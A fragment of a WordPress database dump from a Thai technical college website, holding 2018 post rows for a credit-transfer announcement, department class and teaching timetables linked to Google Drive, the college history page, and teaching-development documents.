(2518, 1, '2018-05-16 17:27:57', '2018-05-16 10:27:57', '<a href=\"/wp-content/uploads/2018/05/0001.jpg\"><img class=\"aligncenter size-large wp-image-2519\" src=\"/wp-content/uploads/2018/05/0001-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a>', 'ประกาศเรื่อง การขอโอนผลการเรียน ประจำปีการศึกษา 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%ad%e0%b9%82%e0%b8%ad%e0%b8%99%e0%b8%9c%e0%b8%a5', '', '', '2018-05-16 17:27:57', '2018-05-16 10:27:57', '', 0, 'http://www.technicrayong.ac.th/?p=2518', 423, 'post', '', 0),
(2519, 1, '2018-05-16 17:26:47', '2018-05-16 10:26:47', '', '0001', '', 'inherit', 'closed', 'closed', '', '0001', '', '', '2018-05-16 17:26:47', '2018-05-16 10:26:47', '', 2518, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/0001.jpg', 0, 'attachment', 'image/jpeg', 0),
(2520, 1, '2018-05-16 17:27:57', '2018-05-16 10:27:57', '<a href=\"/wp-content/uploads/2018/05/0001.jpg\"><img class=\"aligncenter size-large wp-image-2519\" src=\"/wp-content/uploads/2018/05/0001-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a>', 'ประกาศเรื่อง การขอโอนผลการเรียน ประจำปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '2518-revision-v1', '', '', '2018-05-16 17:27:57', '2018-05-16 10:27:57', '', 2518, 'http://www.technicrayong.ac.th/2518-revision-v1/', 0, 'revision', '', 0),
(2521, 1, '2018-05-16 17:28:08', '2018-05-16 10:28:08', '<a href=\"/wp-content/uploads/2018/05/0001.jpg\"><img class=\"aligncenter size-large wp-image-2519\" src=\"/wp-content/uploads/2018/05/0001-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a>', 'ประกาศเรื่อง การขอโอนผลการเรียน ประจำปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '2518-autosave-v1', '', '', '2018-05-16 17:28:08', '2018-05-16 10:28:08', '', 2518, 'http://www.technicrayong.ac.th/2518-autosave-v1/', 0, 'revision', '', 0),
(2522, 4, '2018-05-17 06:25:58', '2018-05-16 23:25:58', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1uiLC_aSepecWUM24PBRbwU1Tp_cQ6VSS\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<a href=\"https://drive.google.com/open?id=17bRalt-R4DwZhWe128GBHupz7KvZnCaZ\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\n\n<a href=\"https://drive.google.com/open?id=1fcNLtBAulZ5JcgKfnCckUlpJWyRLYOrH\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างอิเล็กทรอนิกส์', '', 'inherit', 'closed', 'closed', '', '2231-autosave-v1', '', '', '2018-05-17 06:25:58', '2018-05-16 23:25:58', '', 2231, 'http://www.technicrayong.ac.th/2231-autosave-v1/', 0, 'revision', '', 0),
(2523, 4, '2018-05-17 06:25:50', '2018-05-16 23:25:50', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1uiLC_aSepecWUM24PBRbwU1Tp_cQ6VSS\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=17bRalt-R4DwZhWe128GBHupz7KvZnCaZ\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1fcNLtBAulZ5JcgKfnCckUlpJWyRLYOrH\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างอิเล็กทรอนิกส์', '', 'inherit', 'closed', 'closed', '', '2231-revision-v1', '', '', '2018-05-17 06:25:50', '2018-05-16 23:25:50', '', 2231, 'http://www.technicrayong.ac.th/2231-revision-v1/', 0, 'revision', '', 0),
(2525, 4, '2018-05-17 06:26:53', '2018-05-16 23:26:53', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1c4x-j0d7XBjXqB8PTnA6reTzALVOxY0K\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=10fBODdSELRkQXsXxfaXTlS8YtnUA01xr\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<a href=\"https://drive.google.com/open?id=14TUVwKNCx3KrL7IS5kvcUllrnpugYn2m\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางช่างยนต์/เทคนิคเครื่องกล', '', 'inherit', 'closed', 'closed', '', '2189-revision-v1', '', '', '2018-05-17 06:26:53', '2018-05-16 23:26:53', '', 2189, 'http://www.technicrayong.ac.th/2189-revision-v1/', 0, 'revision', '', 0),
(2527, 4, '2018-05-17 06:30:34', '2018-05-16 23:30:34', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1yhWxgG2BObpsRSiURW2iSvg3IlxAMAWv\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางสาขาวิชาเทคโนโลยีสารสนเทศ', '', 'inherit', 'closed', 'closed', '', '2294-revision-v1', '', '', '2018-05-17 06:30:34', '2018-05-16 23:30:34', '', 2294, 'http://www.technicrayong.ac.th/2294-revision-v1/', 0, 'revision', '', 0),
(2529, 4, '2018-05-17 06:31:41', '2018-05-16 23:31:41', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1A6EOADOCHVi7kojV1eOxTVvQ2Kp4rq6b\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกปิโตรเคมี', '', 'inherit', 'closed', 'closed', '', '2243-revision-v1', '', '', '2018-05-17 06:31:41', '2018-05-16 23:31:41', '', 2243, 'http://www.technicrayong.ac.th/2243-revision-v1/', 0, 'revision', '', 0),
(2531, 4, '2018-05-17 06:32:30', '2018-05-16 23:32:30', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1OWe9N1wFXCKBcx6x059z2kJ3l-kcMmNU\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างก่อสร้าง', '', 'inherit', 'closed', 'closed', '', '2235-autosave-v1', '', '', '2018-05-17 06:32:30', '2018-05-16 23:32:30', '', 2235, 'http://www.technicrayong.ac.th/2235-autosave-v1/', 0, 'revision', '', 0),
(2533, 3, '2018-05-17 17:36:36', '2018-05-17 10:36:36', '', '2', '', 'inherit', 'closed', 'closed', '', '2', '', '', '2018-05-17 17:36:36', '2018-05-17 10:36:36', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/2.jpg', 0, 'attachment', 'image/jpeg', 0),
(2534, 3, '2018-05-17 17:39:02', '2018-05-17 10:39:02', '', '3', '', 'inherit', 'closed', 'closed', '', '3', '', '', '2018-05-17 17:39:02', '2018-05-17 10:39:02', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/3.jpg', 0, 'attachment', 'image/jpeg', 0),
(2535, 3, '2018-05-17 17:45:11', '2018-05-17 10:45:11', '', '17-5-2561 17-47-11', '', 'inherit', 'closed', 'closed', '', '17-5-2561-17-47-11', '', '', '2018-05-17 17:45:11', '2018-05-17 10:45:11', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/17-5-2561-17-47-11.jpg', 0, 'attachment', 'image/jpeg', 0),
(2536, 3, '2018-05-17 17:51:20', '2018-05-17 10:51:20', '', 'biodiversity-21597-1', '', 'inherit', 'closed', 'closed', '', 'biodiversity-21597-1', '', '', '2018-05-17 17:51:20', '2018-05-17 10:51:20', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/biodiversity-21597-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(2537, 3, '2018-05-17 17:52:40', '2018-05-17 10:52:40', '', '17-5-2561 17-54-14', '', 'inherit', 'closed', 'closed', '', '17-5-2561-17-54-14', '', '', '2018-05-17 17:52:40', '2018-05-17 10:52:40', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/17-5-2561-17-54-14.jpg', 0, 'attachment', 'image/jpeg', 0),
(2538, 3, '2018-05-17 17:54:27', '2018-05-17 10:54:27', '', '17-5-2561 17-56-09', '', 'inherit', 'closed', 'closed', '', '17-5-2561-17-56-09', '', '', '2018-05-17 17:54:27', '2018-05-17 10:54:27', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/17-5-2561-17-56-09.jpg', 0, 'attachment', 'image/jpeg', 0),
(2539, 3, '2018-05-17 17:56:50', '2018-05-17 10:56:50', '', '17-5-2561 17-58-52', '', 'inherit', 'closed', 'closed', '', '17-5-2561-17-58-52', '', '', '2018-05-17 17:56:50', '2018-05-17 10:56:50', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/17-5-2561-17-58-52.jpg', 0, 'attachment', 'image/jpeg', 0),
(2542, 3, '2018-05-17 18:02:34', '2018-05-17 11:02:34', '', '17-5-2561 18-03-44', '', 'inherit', 'closed', 'closed', '', '17-5-2561-18-03-44', '', '', '2018-05-17 18:02:34', '2018-05-17 11:02:34', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/17-5-2561-18-03-44.jpg', 0, 'attachment', 'image/jpeg', 0),
(2543, 3, '2018-05-17 18:03:21', '2018-05-17 11:03:21', '', '17-5-2561 18-05-19', '', 'inherit', 'closed', 'closed', '', '17-5-2561-18-05-19', '', '', '2018-05-17 18:03:21', '2018-05-17 11:03:21', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/17-5-2561-18-05-19.jpg', 0, 'attachment', 'image/jpeg', 0),
(2544, 3, '2018-05-17 18:04:06', '2018-05-17 11:04:06', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-2464 size-full aligncenter\" src=\"/wp-content/uploads/2018/05/1-1.jpg\" alt=\"\" width=\"837\" height=\"593\" /></h4>\r\n<img class=\"aligncenter wp-image-2533 size-full\" src=\"/wp-content/uploads/2018/05/2.jpg\" alt=\"\" width=\"837\" height=\"590\" /><img class=\"aligncenter wp-image-2534 size-full\" src=\"/wp-content/uploads/2018/05/3.jpg\" alt=\"\" width=\"837\" height=\"571\" />\r\n\r\n<img class=\"size-full wp-image-2535 aligncenter\" src=\"/wp-content/uploads/2018/05/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" /><img class=\"aligncenter size-full wp-image-2537\" src=\"/wp-content/uploads/2018/05/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"aligncenter wp-image-2536 size-full\" src=\"/wp-content/uploads/2018/05/biodiversity-21597-1.jpg\" alt=\"\" width=\"800\" height=\"600\" />\r\n<h4></h4>\r\n<img class=\"aligncenter size-full wp-image-2538\" src=\"/wp-content/uploads/2018/05/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" /><img class=\"aligncenter wp-image-2539 size-full\" src=\"/wp-content/uploads/2018/05/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-2542 size-full\" src=\"/wp-content/uploads/2018/05/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" /><img class=\"aligncenter wp-image-2543 size-full\" src=\"/wp-content/uploads/2018/05/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<a href=\"/วิสัยทัศน์/\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/พันธกิจ/\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/ปรัชญา/\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a><a href=\"/เอกลักษณ์/\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-05-17 18:04:06', '2018-05-17 11:04:06', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(2545, 4, '2018-11-12 15:10:23', '2018-11-12 08:10:23', '<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1zgMqsJ1EQAf994V8G0dQLF8OidBBP5Rs\">คู่มือ ID Plan</a></span></p>\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/file/d/1yfr-R9TRPAKzbTqzhKwgos92gWFEhU63/view?usp=sharing\"><span style=\"color: #800080;\">คู่มือ PLC</span></a></p>\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1DUO94GAj503xoHcT_zh42s7UEZ76_Yu9\">เอกสารประกอบการบรรยายการประเมินตนเองและ ID Plan</a></span></p>\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1iEy9kHBnv7TkIEOFnr1X8FmtQ_J3Z52C\">เอกสารประกอบการบรรยาย PLC</a></span></p>\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=13W0BfhXa2lokedlGTwLCq3-Tp4Ta4np0\">เอกสารประกอบการบรรยาย ว.21</a></span></p>\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1S8NUwHl1LTsPKIwiTVwvdpEqurK9ojV6\">ถาม-ตอบ เกี่ยวกับ ว.21</a></span></p>\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a></span></p>\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a></span></p>\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1h4nIcmATgPGm4SsrvyheCzZT457lOiRc\">ว.21</a></p>\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1sGN5LP53gIappo8Oc-j7Y7zpus4UUxpj\">ว.22</a></p>\n <a href=\"https://drive.google.com/drive/folders/1DPvIS_GgW189lGehlVcgYl_M_eVUwPmH?usp=sharing\">เอกสารอบรม PLC 10-11 พฤศจิกายน 2561 </a>', 'เอกสารพัฒนาการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '2169-autosave-v1', '', '', '2018-11-12 15:10:23', '2018-11-12 08:10:23', '', 2169, 'http://www.technicrayong.ac.th/2169-autosave-v1/', 0, 'revision', '', 0),
(2546, 4, '2018-05-19 11:16:20', '2018-05-19 04:16:20', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1I8IzCaFRbKs9qyITbQ1v29Qkafdtoyqr\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<a href=\"https://drive.google.com/open?id=19k1qJIBg00k5cI_rNSqI0w3BawkUjwEC\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\n\n<a href=\"https://drive.google.com/open?id=153ZA8T2PiptF8qHWSXMEyslhQK0DcRsW\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างกลโรงงาน/เทคนิคการผลิต', '', 'inherit', 'closed', 'closed', '', '2215-autosave-v1', '', '', '2018-05-19 11:16:20', '2018-05-19 04:16:20', '', 2215, 'http://www.technicrayong.ac.th/2215-autosave-v1/', 0, 'revision', '', 0),
(2547, 4, '2018-05-19 11:05:43', '2018-05-19 04:05:43', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1I8IzCaFRbKs9qyITbQ1v29Qkafdtoyqr\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=19k1qJIBg00k5cI_rNSqI0w3BawkUjwEC\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<a href=\"https://drive.google.com/open?id=153ZA8T2PiptF8qHWSXMEyslhQK0DcRsW\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างกลโรงงาน/เทคนิคการผลิต', '', 'inherit', 'closed', 'closed', '', '2215-revision-v1', '', '', '2018-05-19 11:05:43', '2018-05-19 04:05:43', '', 2215, 'http://www.technicrayong.ac.th/2215-revision-v1/', 0, 'revision', '', 0),
(2548, 4, '2018-05-19 11:17:11', '2018-05-19 04:17:11', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1y0O7XIS34C2eUX3_ga4kzcYMNzqsIjdY\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาอาหารและโภชนาการ', '', 'inherit', 'closed', 'closed', '', '2282-autosave-v1', '', '', '2018-05-19 11:17:11', '2018-05-19 04:17:11', '', 2282, 'http://www.technicrayong.ac.th/2282-autosave-v1/', 0, 'revision', '', 0),
(2550, 4, '2018-05-19 11:18:38', '2018-05-19 04:18:38', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1WbH942zCtIGYtEoJvKeABxvxYMSdCZ5u\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการท่องเที่ยว', '', 'inherit', 'closed', 'closed', '', '2286-revision-v1', '', '', '2018-05-19 11:18:38', '2018-05-19 04:18:38', '', 2286, 'http://www.technicrayong.ac.th/2286-revision-v1/', 0, 'revision', '', 0),
(2551, 4, '2018-05-19 11:19:00', '2018-05-19 04:19:00', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1zM15kJiJTh4hk690TAIcWuUB6w7gxyXp\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาคหกรรมศาสตร์', '', 'inherit', 'closed', 'closed', '', '2278-autosave-v1', '', '', '2018-05-19 11:19:00', '2018-05-19 04:19:00', '', 2278, 'http://www.technicrayong.ac.th/2278-autosave-v1/', 0, 'revision', '', 0),
